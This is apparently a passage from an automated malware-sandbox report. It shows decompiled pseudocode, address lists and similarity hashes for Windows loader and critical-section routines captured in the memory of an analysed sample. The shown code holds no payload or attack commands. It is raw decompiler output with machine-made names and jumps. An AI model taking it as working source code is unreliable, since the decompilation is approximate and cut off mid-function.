					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 4))))))();
				}
				return 0;
			}

0x3417707d
0x3417707f
0x34177084
0x34177087
0x3417708a
0x3417708f
0x341d1534
0x341d1535
0x341d1536
0x341d1537
0x341d1537
0x34177095
0x3417709b
0x3417709d
0x3417709f
0x341770a1
0x341770a3
0x341d1541
0x341d1545
0x341770a9
0x341770b0
0x341770bf
0x341770c5
0x341770c7
0x341770cb
0x341770c5
0x341770cf
0x341770d3
0x341770d5
0x341770d9
0x341770de
0x341d1551
0x341d1555
0x341d155f
0x341d1561
0x341d1574
0x341d1577
0x341d1577
0x341d1577
0x341d157e
0x341d1563
0x341d1563
0x341d1567
0x341d156b
0x341d156b
0x341d1561
0x341d1581
0x341d1584
0x341d1586
0x341d158b
0x341d158f
0x341d159c
0x341d15a2
0x341d15a2
0x341d158f
0x341770e8
0x3417710e
0x34177111
0x34177115
0x3417711a
0x3417711c
0x341d15b5
0x34177122
0x34177122
0x34177122
0x34177129
0x3417712b
0x341d15ce
0x341d15ce
0x3417713c
0x34177143
0x34177147
0x341d15e0
0x341d15e6
0x341d15e6
0x34177147
0x341770ee
0x34177157
0x34177159
0x3417715e
0x34177163
0x34177167
0x341d15f5
0x341d15fb
0x341d15fb
0x34177167
0x34177159
0x341770f4
0x341770ff
0x00000000
0x34177106
0x341d1602
0x341d1606
0x341d1607
0x341d1611
0x341d1617
0x341d1617
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 341D15E0
RtlDebugPrintTimes.NTDLL ref: 341D15F5

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: ca76f614f62d9217572e178ad9d6850e9346ca32535ecea48bdff2d5e8393a73
Instruction ID: f3ad95d13520497355b88e099bf522d38727b6557688cb4aa36e78d56037a1d7
Opcode Fuzzy Hash: ca76f614f62d9217572e178ad9d6850e9346ca32535ecea48bdff2d5e8393a73
Instruction Fuzzy Hash: 4F51D1B6A00B05EFEB05DF64C8C47ADBBB5FF46355F1181A9E41297290DBB4A911CF80

Uniqueness

Uniqueness Score: -1.00%

Function 34203608 Relevance: 4.1, Strings: 3, Instructions: 398
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E34203608(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t140;
				short _t141;
				signed char* _t146;
				char* _t147;
				signed char* _t149;
				intOrPtr _t150;
				signed short _t167;
				intOrPtr _t185;
				signed int _t193;
				intOrPtr _t201;
				void* _t204;
				void* _t205;
				signed char* _t206;
				signed char* _t213;
				intOrPtr _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t220;
				short _t223;
				signed short _t230;
				char* _t232;
				intOrPtr* _t235;
				void* _t239;
				void* _t245;
				void* _t258;
				intOrPtr _t266;
				intOrPtr _t267;
				intOrPtr _t269;
				char* _t271;
				char* _t274;
				signed int _t275;
				void* _t279;
				void* _t280;

				_push(0x45c);
				_push(0x3424cf20);
				E341C7C40(__ebx, __edi, __esi);
				 *(_t280 - 0x430) = __edx;
				_t266 = __ecx;
				 *((intOrPtr*)(_t280 - 0x428)) = __ecx;
				 *((intOrPtr*)(_t280 - 0x440)) =  *((intOrPtr*)(_t280 + 8));
				 *((intOrPtr*)(_t280 - 0x450)) =  *((intOrPtr*)(_t280 + 0x10));
				 *((intOrPtr*)(_t280 - 0x44c)) =  *((intOrPtr*)(_t280 + 0x14));
				 *((intOrPtr*)(_t280 - 0x444)) =  *((intOrPtr*)(_t280 + 0x18));
				 *((intOrPtr*)(_t280 - 0x434)) =  *((intOrPtr*)(_t280 + 0x1c));
				_t223 = 0x42;
				 *((short*)(_t280 - 0x43c)) = _t223;
				_t140 = 0x44;
				 *((short*)(_t280 - 0x43a)) = _t140;
				 *(_t280 - 0x438) = L"LdrpResSearchResourceHandle Enter";
				_t141 = 0x40;
				 *((short*)(_t280 - 0x464)) = _t141;
				 *((short*)(_t280 - 0x462)) = _t223;
				 *(_t280 - 0x460) = L"LdrpResSearchResourceHandle Exit";
				_t271 = 0;
				E341B8F40(_t280 - 0xc8, 0, _t141 + 0x6c);
				if(E34183C40() == 0) {
					_t146 = 0x7ffe0385;
				} else {
					_t146 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				if(( *_t146 & 0x00000001) == 0) {
					_t213 = 0x7ffe0384;
				} else {
					_t205 = E34183C40();
					_t213 = 0x7ffe0384;
					if(_t205 == 0) {
						_t206 = 0x7ffe0384;
					} else {
						_t206 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					E341FFC01(_t280 - 0x43c,  *_t206 & 0x000000ff);
				}
				if(_t266 == 0 || _t266 == 0xffffffff) {
					_t267 = 0xc000000d;
					goto L16;
				} else {
					 *(_t280 - 0x42c) =  *(_t280 - 0x430) & 0x00001000;
					_t150 = E3420314A(_t266, _t280 - 0x45c);
					if(_t150 >= 0 ||  *(_t280 - 0x42c) == _t271) {
						_t150 = E34203592(_t266, _t280 - 0x210, 0x40);
						if(_t150 >= 0) {
							if( *((intOrPtr*)(_t280 - 0x210)) == 0x5a4d) {
								_t269 =  *((intOrPtr*)(_t280 - 0x1d4));
								if( *(_t280 - 0x42c) == _t271) {
									L22:
									_t150 = E34203592( *((intOrPtr*)(_t280 - 0x428)), _t280 - 0x1d0, 0x108);
									if(_t150 >= 0) {
										if( *((intOrPtr*)(_t280 - 0x1d0)) != 0x4550) {
											goto L15;
										} else {
											if( *((intOrPtr*)(_t280 - 0x1b8)) != 0x10b) {
												if( *((intOrPtr*)(_t280 - 0x1b8)) != 0x20b ||  *((intOrPtr*)(_t280 - 0x1cc)) != 0x200 &&  *((intOrPtr*)(_t280 - 0x1cc)) != 0x8664) {
													goto L15;
												} else {
													if( *((intOrPtr*)(_t280 - 0x14c)) <= 2 ||  *((intOrPtr*)(_t280 - 0x134)) == _t271) {
														goto L30;
													} else {
														_t230 =  *((intOrPtr*)(_t280 - 0x1bc));
														if(_t230 == 0 || _t230 < 0x88) {
															goto L15;
														} else {
															_t216 =  *((intOrPtr*)(_t280 - 0x138));
															goto L43;
														}
													}
												}
											} else {
												_t245 = 0x14c;
												_t201 =  *((intOrPtr*)(_t280 - 0x1cc));
												if(_t201 == _t245 || _t201 == _t245 + 0x74 || _t201 == 0x1c2 || _t201 == 0x1c4) {
													if( *((intOrPtr*)(_t280 - 0x15c)) > 2) {
														if( *((intOrPtr*)(_t280 - 0x144)) == _t271) {
															goto L30;
														} else {
															_t230 =  *((intOrPtr*)(_t280 - 0x1bc));
															if(_t230 == 0 || _t230 < 0x78) {
																goto L15;
															} else {
																_t216 =  *((intOrPtr*)(_t280 - 0x148));
																L43:
																if(_t216 != 0) {
																	_t167 =  *(_t280 - 0x1ca);
																	if(_t167 != 0) {
																		_t273 = (_t167 & 0x0000ffff) * 0x28;
																		if((_t230 & 0x0000ffff) + 0x18 + (_t167 & 0x0000ffff) * 0x28 + _t269 <=  *((intOrPtr*)(_t280 - 0x45c))) {
																			_t147 = E34185D90(_t230,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t273);
																			 *(_t280 - 0x420) = _t147;
																			 *(_t280 - 0x448) = _t147;
																			if(_t147 != 0) {
																				_t274 =  *(_t280 - 0x420);
																				_t267 = E34203592( *((intOrPtr*)(_t280 - 0x428)), _t274, _t273);
																				 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																				if(_t267 < 0) {
																					L59:
																					_t147 =  *(_t280 - 0x420);
																					goto L60;
																				} else {
																					_t232 = _t274;
																					 *(_t280 - 0x438) = _t274;
																					_t258 = 0;
																					_t275 =  *(_t280 - 0x1ca) & 0x0000ffff;
																					if(_t275 != 0) {
																						while(_t216 < _t232[0xc] || _t216 >= _t232[0x10] + _t232[0xc]) {
																							_t232 =  &(_t232[0x28]);
																							_t258 = _t258 + 1;
																							if(_t258 < _t275) {
																								continue;
																							}
																							break;
																						}
																						 *(_t280 - 0x438) = _t232;
																					}
																					if(_t258 < _t275) {
																						_t278 = _t232[0x14] - _t232[0xc] + _t216;
																						if(_t232[0x14] - _t232[0xc] + _t216 == 0) {
																							goto L58;
																						} else {
																							_t217 =  *((intOrPtr*)(_t280 - 0x428));
																							_t267 = E34203C37(_t217, _t278);
																							 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																							if(_t267 < 0) {
																								goto L59;
																							} else {
																								if( *((intOrPtr*)(_t280 + 0xc)) != 3) {
																									L73:
																									 *((short*)(_t280 - 0x424)) = 0;
																									_t260 = _t217;
																									_t267 = L3417E9A0(0, _t217,  *((intOrPtr*)(_t280 - 0x45c)), _t278, _t280 - 0x1d0,  *(_t280 - 0x438),  *((intOrPtr*)(_t280 - 0x440)),  *((intOrPtr*)(_t280 + 0xc)), _t280 - 0x418,  *((intOrPtr*)(_t280 - 0x450)),  *((intOrPtr*)(_t280 - 0x44c)),  *(_t280 - 0x430), _t280 - 0x424);
																									 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																									if(_t267 < 0) {
																										goto L59;
																									} else {
																										_t235 =  *((intOrPtr*)(_t280 - 0x434));
																										if(_t235 == 0) {
																											goto L59;
																										} else {
																											_t182 =  *((intOrPtr*)(_t280 - 0x424));
																											_t271 = 0;
																											if( *((intOrPtr*)(_t280 - 0x424)) != 0) {
																												 *((intOrPtr*)(_t280 - 0x468)) = _t280 - 0xc8;
																												 *((short*)(_t280 - 0x46a)) = 0xac;
																												_t267 = L34195A40(_t260, _t182 & 0x0000ffff, _t280 - 0x46c, 2, 0);
																												 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																												if(_t267 < 0) {
																													goto L85;
																												} else {
																													_t218 = _t280 - 0xc8;
																													_t239 = _t218 + 2;
																													do {
																														_t185 =  *_t218;
																														_t218 = _t218 + 2;
																													} while (_t185 != 0);
																													_t220 = _t218 - _t239 >> 1;
																													_t235 =  *((intOrPtr*)(_t280 - 0x434));
																													goto L81;
																												}
																											} else {
																												_t220 = 0;
																												L81:
																												 *(_t280 - 4) = _t271;
																												if(_t220 >=  *_t235) {
																													L84:
																													 *_t235 = _t220 + 1;
																													_t267 = 0xc0000023;
																													 *((intOrPtr*)(_t280 - 0x41c)) = 0xc0000023;
																													 *(_t280 - 4) = 0xfffffffe;
																													L85:
																													_t147 =  *(_t280 - 0x420);
																													goto L61;
																												} else {
																													_t187 =  *((intOrPtr*)(_t280 - 0x444));
																													if( *((intOrPtr*)(_t280 - 0x444)) == 0) {
																														goto L84;
																													} else {
																														_t279 = _t220 + _t220;
																														L341B88C0(_t187, _t280 - 0xc8, _t279);
																														 *((intOrPtr*)( *((intOrPtr*)(_t280 - 0x434)))) = _t220 + 1;
																														 *((short*)(_t279 +  *((intOrPtr*)(_t280 - 0x444)))) = 0;
																														 *(_t280 - 4) = 0xfffffffe;
																														goto L59;
																													}
																												}
																											}
																										}
																									}
																								} else {
																									 *((short*)(_t280 - 0x418)) = 0;
																									_t193 =  *( *((intOrPtr*)(_t280 - 0x440)) + 8) & 0x0000ffff;
																									_t243 =  *(_t280 - 0x430);
																									if(( *(_t280 - 0x430) & 0x00000020) == 0) {
																										_t267 = E3417A2E0(0, 0, _t193, _t243, _t280 - 0x418);
																										 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
																										if(_t267 >= 0 ||  *(_t280 - 0x42c) == 0) {
																											goto L73;
																										} else {
																											goto L59;
																										}
																									} else {
																										 *((short*)(_t280 - 0x418)) = 1;
																										 *((short*)(_t280 - 0x414)) = 0;
																										goto L73;
																									}
																								}
																							}
																						}
																						goto L93;
																					} else {
																						L58:
																						_t267 = 0xc000007b;
																						 *((intOrPtr*)(_t280 - 0x41c)) = 0xc000007b;
																						goto L59;
																					}
																				}
																			} else {
																				_t267 = 0xc0000017;
																				 *((intOrPtr*)(_t280 - 0x41c)) = 0xc0000017;
																				L60:
																				_t271 = 0;
																			}
																		} else {
																			_t271 = 0;
																			goto L46;
																		}
																	} else {
																		L46:
																		_t267 = 0xc000007b;
																		 *((intOrPtr*)(_t280 - 0x41c)) = 0xc000007b;
																		_t147 = _t271;
																	}
																	L61:
																	_t213 = 0x7ffe0384;
																	goto L62;
																} else {
																	_t150 = 0xc0000089;
																}
															}
														}
													} else {
														L30:
														_t267 = 0xc0000089;
														goto L16;
													}
												} else {
													goto L15;
												}
											}
										}
									}
								} else {
									if(E341694A3(_t269, 0xf8, _t280 - 0x448) < 0 || _t269 > 0x10000000) {
										goto L15;
									} else {
										_t204 = _t269 + 0xf8;
										if(_t204 <= _t269 || _t204 >=  *((intOrPtr*)(_t280 - 0x45c))) {
											goto L15;
										} else {
											goto L22;
										}
									}
								}
							} else {
								L15:
								_t267 = 0xc000007b;
								L16:
								 *((intOrPtr*)(_t280 - 0x41c)) = _t267;
								_t147 = _t271;
								L62:
								if(_t147 != 0) {
									L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t271, _t147);
									_t267 =  *((intOrPtr*)(_t280 - 0x41c));
								}
								if(E34183C40() == 0) {
									_t149 = 0x7ffe0385;
								} else {
									_t149 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
									_t267 =  *((intOrPtr*)(_t280 - 0x41c));
								}
								if(( *_t149 & 0x00000001) != 0) {
									if(E34183C40() != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
										_t267 =  *((intOrPtr*)(_t280 - 0x41c));
									}
									E341FFC01(_t280 - 0x464,  *_t213 & 0x000000ff);
								}
								_t150 = _t267;
							}
						}
					}
				}
				L93:
				 *[fs:0x0] =  *((intOrPtr*)(_t280 - 0x10));
				return _t150;
			}

0x34203608
0x3420360d
0x34203612
0x34203617
0x3420361d
0x3420361f
0x34203628
0x34203631
0x3420363a
0x34203643
0x3420364c
0x34203654
0x34203655
0x3420365e
0x3420365f
0x34203666
0x34203672
0x34203673
0x3420367a
0x34203681
0x3420368f
0x34203699
0x342036a8
0x342036ba
0x342036aa
0x342036b3
0x342036b3
0x342036c2
0x342036f4
0x342036c4
0x342036c4
0x342036c9
0x342036d0
0x342036e2
0x342036d2
0x342036db
0x342036db
0x342036ed
0x342036ed
0x342036fb
0x34203be3
0x00000000
0x3420370a
0x34203715
0x34203723
0x3420372a
0x34203745
0x3420374c
0x3420375e
0x34203772
0x3420377e
0x342037b1
0x342037c5
0x342037cc
0x342037dc
0x00000000
0x342037de
0x342037ea
0x34203862
0x00000000
0x34203886
0x3420388d
0x00000000
0x34203897
0x34203897
0x342038a1
0x00000000
0x342038b5
0x342038b5
0x00000000
0x342038b5
0x342038a1
0x3420388d
0x342037ec
0x342037ec
0x342037ef
0x342037f9
0x34203820
0x34203832
0x00000000
0x34203834
0x34203834
0x3420383e
0x00000000
0x3420384e
0x3420384e
0x342038bb
0x342038bd
0x342038c9
0x342038d3
0x342038ea
0x342038fd
0x3420390f
0x34203914
0x3420391a
0x34203922
0x34203932
0x34203950
0x34203952
0x3420395a
0x3420399d
0x3420399d
0x00000000
0x3420395c
0x3420395c
0x3420395e
0x34203964
0x34203966
0x3420396f
0x34203971
0x34203980
0x34203983
0x34203986
0x00000000
0x00000000
0x00000000
0x34203986
0x34203988
0x34203988
0x34203990
0x342039f0
0x342039f2
0x00000000
0x342039f4
0x342039f6
0x34203a03
0x34203a05
0x34203a0d
0x00000000
0x34203a0f
0x34203a13
0x34203a73
0x34203a75
0x34203ab9
0x34203ac2
0x34203ac4
0x34203acc
0x00000000
0x34203ad2
0x34203ad2
0x34203ada
0x00000000
0x34203ae0
0x34203ae0
0x34203ae7
0x34203aec
0x34203af8
0x34203b03
0x34203b1d
0x34203b1f
0x34203b27
0x00000000
0x34203b29
0x34203b29
0x34203b2f
0x34203b32
0x34203b32
0x34203b35
0x34203b38
0x34203b3f
0x34203b41
0x00000000
0x34203b41
0x34203aee
0x34203aee
0x34203b47
0x34203b47
0x34203b4c
0x34203b8f
0x34203b92
0x34203b94
0x34203b99
0x34203b9f
0x34203ba6
0x34203ba6
0x00000000
0x34203b4e
0x34203b4e
0x34203b56
0x00000000
0x34203b58
0x34203b58
0x34203b64
0x34203b75
0x34203b7f
0x34203b83
0x00000000
0x34203b83
0x34203b56
0x34203b4c
0x34203aec
0x34203ada
0x34203a15
0x34203a17
0x34203a24
0x34203a28
0x34203a31
0x34203a5a
0x34203a5c
0x34203a64
0x00000000
0x00000000
0x00000000
0x00000000
0x34203a33
0x34203a36
0x34203a3f
0x00000000
0x34203a3f
0x34203a31
0x34203a13
0x34203a0d
0x00000000
0x34203992
0x34203992
0x34203992
0x34203997
0x00000000
0x34203997
0x34203990
0x34203924
0x34203924
0x34203929
0x342039a3
0x342039a3
0x342039a3
0x342038ff
0x342038ff
0x00000000
0x342038ff
0x342038d5
0x342038d5
0x342038d5
0x342038da
0x342038e0
0x342038e0
0x342039a5
0x342039a5
0x00000000
0x342038bf
0x342038bf
0x342038bf
0x342038bd
0x3420383e
0x34203822
0x34203822
0x34203822
0x00000000
0x34203822
0x00000000
0x00000000
0x00000000
0x342037f9
0x342037ea
0x342037dc
0x34203780
0x34203795
0x00000000
0x3420379f
0x3420379f
0x342037a7
0x00000000
0x00000000
0x00000000
0x00000000
0x342037a7
0x34203795
0x34203760
0x34203760
0x34203760
0x34203765
0x34203765
0x3420376b
0x342039aa
0x342039ac
0x342039b9
0x342039be
0x342039be
0x342039cb
0x34203bed
0x342039d1
0x342039da
0x342039df
0x342039df
0x34203bf5
0x34203bfe
0x34203c09
0x34203c0f
0x34203c0f
0x34203c1e
0x34203c1e
0x34203c23
0x34203c23
0x3420375e
0x3420374c
0x3420372a
0x34203c25
0x34203c28
0x34203c34

Strings

LdrpResSearchResourceHandle Exit, xrefs: 34203681
PE, xrefs: 342037D2
LdrpResSearchResourceHandle Enter, xrefs: 34203666

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
API String ID: 0-1168191160
Opcode ID: 62c8c1431f218d512d61bde654e7eb919bd79fdbbe2f860be5088e8e4d5a4d01
Instruction ID: b0888a588fa849b0c3ccef12eb8c9f6c1c8a5fa1a75521a63a538cf9caac04b5
Opcode Fuzzy Hash: 62c8c1431f218d512d61bde654e7eb919bd79fdbbe2f860be5088e8e4d5a4d01
Instruction Fuzzy Hash: A4F15DB5A006298BDB20CB18CC90BD9B3F5FF44754F4480EADA09B7250EB319E85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 3419F4D0 Relevance: 4.1, Strings: 3, Instructions: 382
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E3419F4D0(signed int __ecx, signed char __edx, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed char _v72;
				signed int _v76;
				char _v80;
				void* _v84;
				char _v88;
				signed int _v92;
				intOrPtr _v96;
				void* _v100;
				signed int _v104;
				char _v108;
				signed char _v112;
				intOrPtr _v116;
				void* _v120;
				signed int _v124;
				signed int _v128;
				char _v129;
				char _v130;
				intOrPtr _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t129;
				signed int _t132;
				signed int _t134;
				signed char* _t138;
				signed char* _t139;
				signed char* _t140;
				void* _t142;
				signed int _t144;
				signed int _t145;
				void* _t152;
				void* _t153;
				signed int _t156;
				signed int _t159;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t176;
				signed int _t179;
				signed int* _t180;
				signed int _t183;
				signed int _t191;
				signed char* _t192;
				signed int _t198;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t203;
				void* _t206;
				unsigned int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				intOrPtr _t218;
				intOrPtr _t220;
				signed int _t223;
				signed int _t226;
				intOrPtr _t229;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t238;
				signed char _t241;
				void* _t244;
				signed int _t246;
				intOrPtr _t247;
				void* _t251;
				signed int _t252;
				signed int _t254;
				void* _t255;
				void* _t256;

				_t234 = __edx;
				_t209 = __ecx;
				_t254 = (_t252 & 0xfffffff8) - 0x84;
				_v8 =  *0x3426b370 ^ _t254;
				_t129 =  *[fs:0x18];
				_t241 = __ecx;
				_v112 = __edx;
				_v72 = __ecx;
				_v129 = 0;
				_v64 = _t129;
				_v108 = 0;
				if(__ecx == 0x34263390) {
					_v129 = 1;
					 *((intOrPtr*)(_t129 + 0xf84)) = 1;
				}
				if( *0x34265da8 != 0) {
					_push(0xc000004b);
					_push(0xffffffff);
					E341B2C70();
				}
				if( *0x34265a84 == 0) {
					_v120 = 0x34265a88;
				} else {
					_v120 = 0;
				}
				_t246 = _t241 + 0x10;
				if( *(_t241 + 0x10) == 0) {
					_t210 = _t209 | 0xffffffff;
					__eflags =  *0x34264ae2;
					_v124 = _t210;
					if( *0x34264ae2 != 0) {
						_push(0);
						_push("true");
						_push(0);
						_push(0x100003);
						_push( &_v124);
						_t132 = E341B2E30();
						__eflags = _t132;
						if(_t132 >= 0) {
							_t211 = _v124;
						} else {
							_t211 = _t210 | 0xffffffff;
							_v124 = _t210 | 0xffffffff;
						}
					}
					asm("lock cmpxchg [esi], ecx");
					__eflags = 0;
					if(0 != 0) {
						_t198 = _v124;
						__eflags = _t198 - 0xffffffff;
						if(_t198 != 0xffffffff) {
							_push(_t198);
							E341B2A80();
						}
					}
				}
				_t134 =  *_t241;
				if(_t134 == 0xffffffff) {
					_t134 = _t134 | 0xffffffff;
					__eflags =  *(_t241 + 0x14) & 0x01000000;
					if(( *(_t241 + 0x14) & 0x01000000) == 0) {
						_t211 = _t241;
						E3419FCE0(_t241, _t234);
						_t134 =  *_t241;
					}
				}
				_v104 = 0;
				if(_t134 != 0xffffffff) {
					 *((intOrPtr*)(_t134 + 0x14)) =  *((intOrPtr*)(_t134 + 0x14)) + 1;
				}
				_t201 =  *_t246;
				_v68 = _t201;
				L9:
				while(1) {
					L9:
					if(E34183C40() != 0) {
						_t138 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t138 = 0x7ffe0382;
					}
					if( *_t138 != 0) {
						_t139 =  *[fs:0x30];
						__eflags = _t139[0x240] & 0x00000002;
						if((_t139[0x240] & 0x00000002) != 0) {
							_v16 = _t241;
							_v54 = 0x1722;
							_v24 =  *(_t241 + 0x14) & 0x00ffffff;
							_v28 =  *(_t241 + 4);
							_v20 =  *((intOrPtr*)(_t241 + 0xc));
							_t191 = ( *[fs:0x30])[0x50];
							__eflags = _t191;
							if(_t191 == 0) {
								L61:
								_t192 = 0x7ffe0382;
							} else {
								__eflags =  *_t191;
								if( *_t191 == 0) {
									goto L61;
								} else {
									_t192 = ( *[fs:0x30])[0x50] + 0x228;
								}
							}
							_t211 =  &_v60;
							_push( &_v60);
							_push(0x10);
							_push(0x20402);
							_push( *_t192 & 0x000000ff);
							E341B2F90();
						}
						goto L12;
						L24:
						if(_t140 < 0) {
							L341C8AA0(_t211, _t234, _t140);
							asm("int3");
							__eflags = _t246 != 4;
							if(_t246 != 4) {
								L47:
								L3419F946(_v132,  &_v124);
								_t152 = 0;
							} else {
								_t238 =  *(_t241 + 4);
								_t153 =  *_t241;
								asm("lock cmpxchg8b [esi]");
								__eflags = _t153 -  *_t241;
								if(_t153 !=  *_t241) {
									goto L47;
								} else {
									__eflags = _t238 -  *(_t241 + 4);
									if(__eflags != 0) {
										goto L47;
									} else {
										_t152 = L3419F8A5(_v132,  &_v124, _a8, _a12);
									}
								}
							}
							return _t152;
						} else {
							if(_v129 != 0) {
								 *((intOrPtr*)(_v64 + 0xf84)) = 0;
								_t156 = ( *[fs:0x30])[0x50];
								__eflags = _t156;
								if(_t156 == 0) {
									L81:
									_t140 = 0x7ffe0384;
								} else {
									__eflags =  *_t156;
									if( *_t156 == 0) {
										goto L81;
									} else {
										_t140 = ( *[fs:0x30])[0x50] + 0x22a;
									}
								}
								__eflags =  *_t140;
								if( *_t140 != 0) {
									_t140 =  *[fs:0x30];
									__eflags = _t140[0x240] & 0x00000004;
									if((_t140[0x240] & 0x00000004) != 0) {
										_t159 = ( *[fs:0x30])[0x50];
										__eflags = _t159;
										if(_t159 == 0) {
											L87:
											_t140 = 0x7ffe0385;
										} else {
											__eflags =  *_t159;
											if( *_t159 == 0) {
												goto L87;
											} else {
												_t140 = ( *[fs:0x30])[0x50] + 0x22b;
											}
										}
										__eflags =  *_t140 & 0x00000020;
										if(( *_t140 & 0x00000020) != 0) {
											_t140 = E341F0227(0x1483, _t234, 0xffffffff, 0xffffffff, 0, 0);
										}
									}
								}
							}
							_pop(_t244);
							_pop(_t251);
							_pop(_t206);
							return L341B4B50(_t140, _t206, _v8 ^ _t254, _t234, _t244, _t251);
						}
					}
					L12:
					if(_t201 != 0xffffffff) {
						_push(_v120);
						_push(0);
						_push(_t201);
						_t140 = L341B29D0();
					} else {
						_t207 = _t241 + 4;
						_v76 =  &_v100 & 0xfffffffc;
						do {
							_t218 =  *[fs:0x18];
							_v100 = _t207;
							_v80 = 1;
							_v88 = 0;
							_v92 = 0;
							_v84 = 0;
							_v96 =  *((intOrPtr*)(_t218 + 0x24));
							_t208 = _v76;
							_t220 =  *((intOrPtr*)(_t218 + 0x30)) + 0x25c;
							_t169 = _t207 >> 0x00000005 & 0x0000007f;
							_v116 = _t220;
							_t235 =  *(_t220 + _t169 * 4);
							_v128 = _t220 + _t169 * 4;
							while(1) {
								_t172 = _t235 & 0xfffffffc;
								_t223 = _t235 & 0x00000003 | _t208;
								_v92 = _t172;
								if(_t172 != 0) {
									_v84 = 0;
									_t223 = _t223 | 0x00000002;
								} else {
									_v84 =  &_v100;
								}
								_t246 = _t223;
								_t173 = _t235;
								asm("lock cmpxchg [edi], esi");
								if(_t173 == _t235) {
									break;
								}
								_t235 = _t173;
							}
							_t241 = _v72;
							_t207 = _t241 + 4;
							if(((_t223 ^ _t235) & 0x00000002) != 0) {
								_t246 = _v128;
								_t236 =  *_t246;
								while(1) {
									_t226 = _t236 & 0xfffffffc;
									__eflags =  *(_t226 + 0x10);
									_v128 = _t226 + 0x10;
									if( *(_t226 + 0x10) == 0) {
										goto L31;
									}
									do {
										L31:
										_t183 = _t226;
										_t226 =  *(_t226 + 8);
										 *(_t226 + 0xc) = _t183;
										__eflags =  *(_t226 + 0x10);
									} while ( *(_t226 + 0x10) == 0);
									L32:
									 *_v128 =  *(_t226 + 0x10);
									__eflags = _t236 & 0x00000001;
									if((_t236 & 0x00000001) != 0) {
										_v130 = 1;
									} else {
										_v130 = 0;
										__eflags = _t236 & 0xfffffffc;
									}
									_t176 = _t236;
									asm("lock cmpxchg [esi], ecx");
									__eflags = _t176 - _t236;
									if(_t176 != _t236) {
										_t236 = _t176;
										_t226 = _t236 & 0xfffffffc;
										__eflags =  *(_t226 + 0x10);
										_v128 = _t226 + 0x10;
										if( *(_t226 + 0x10) == 0) {
											goto L31;
										}
										goto L32;
									}
									__eflags = _v130;
									if(_v130 != 0) {
										_t179 = _t176 & 0xfffffffc;
										__eflags = _t179;
										_v128 = _t179;
										if(_t179 != 0) {
											do {
												_t246 =  *(_t179 + 8);
												_t180 = _t179 + 0x14;
												 *_t180 = 2;
												__eflags =  *_t180;
												if( *_t180 == 0) {
													_push( *((intOrPtr*)(_v128 + 4)));
													E341B30B0();
												}
												_t179 = _t246;
												_v128 = _t179;
												__eflags = _t246;
											} while (_t246 != 0);
										}
									}
									goto L19;
								}
							}
							L19:
							_t234 =  &_v100;
							_t229 = _v116;
							if( *_t207 != _v112) {
								L3419F946(_t229, _t234);
								_t140 = 0;
							} else {
								_t140 = L3419F8A5(_t229, _t234, _v120, 0);
							}
							if(_t140 == 0x102) {
								L70:
								_t202 = _v108;
								_t247 =  *[fs:0x18];
								_push(_t202);
								_t142 = E341B6310( *_v120,  *((intOrPtr*)(_v120 + 4)), 0xff676980, 0xffffffff);
								_push(_t234);
								E341FEF10(0x65, "true", "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t142);
								_t144 =  *_t241;
								_t255 = _t254 + 0x18;
								__eflags = _t144 - 0xffffffff;
								if(_t144 == 0xffffffff) {
									_t145 = 0;
									__eflags = 0;
								} else {
									_t145 =  *((intOrPtr*)(_t144 + 0x14));
								}
								_push(_t145);
								_push(_t241);
								_push( *((intOrPtr*)(_t241 + 0xc)));
								_push( *((intOrPtr*)(_t247 + 0x24)));
								E341FEF10(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t247 + 0x20)));
								_t256 = _t255 + 0x20;
								_t203 = _t202 + 1;
								_t211 = _t241;
								_v108 = _t203;
								_t246 = L3420A9AE(_t241);
								__eflags = _t203 - 2;
								if(_t203 > 2) {
